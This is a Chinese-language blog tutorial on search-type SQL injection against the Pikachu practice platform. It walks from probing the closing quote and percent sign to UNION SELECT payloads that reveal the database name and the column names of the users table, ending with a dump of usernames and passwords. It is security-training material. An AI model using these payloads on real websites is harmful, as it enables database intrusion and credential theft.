C/C++教程

pikachu 漏洞平台sql注入 之 字符型注入

本文主要是介绍pikachu 漏洞平台sql注入 之 字符型注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

http://192.168.66.4/pikachu/vul/sqli/sqli_search.php?name=&submit=%E6%90%9C%E7%B4%A2
随便搜一下得到URL
在这里插入图片描述
找找闭合 判断一下是否存在注入 加了 ’ 之后报出数据库错误 说明执行了 数据库查询语句
在这里插入图片描述
构造PAylodad 先查一下主查询字段数
1、找闭合
看下报错信息
在这里插入图片描述

这里有个百分号 加个百分号试一下 到4报错 看来 是有三个主查询字段
在这里插入图片描述
构造payload
union select database(),2,3%23
查库名 由于知道了 列数 payload必须跟列数对应 所以 database() 后面跟上了 2 ,3 %23 是# 表示注释掉数据库中的 ’ 下图中爆出数据库的名字为pikachu
在这里插入图片描述

接着构造我们的payload 我们知道了库的名字 我们需要接着看看库里面有哪些表

在这里插入图片描述
表中的敏感字段爆出来了 接着构造payload 查查 users
xi%’ union select group_concat(column_name),2,3 from information_schema.columns where table_name=‘users’#
在这里插入图片描述
接着构造payload
dasdas%’ union select username,password,level from users#
在这里插入图片描述
结束 总结 搜索型注入要注意闭合点得加% 因为数据库中用%占位去进行模糊搜索

这篇关于pikachu 漏洞平台sql注入 之 字符型注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!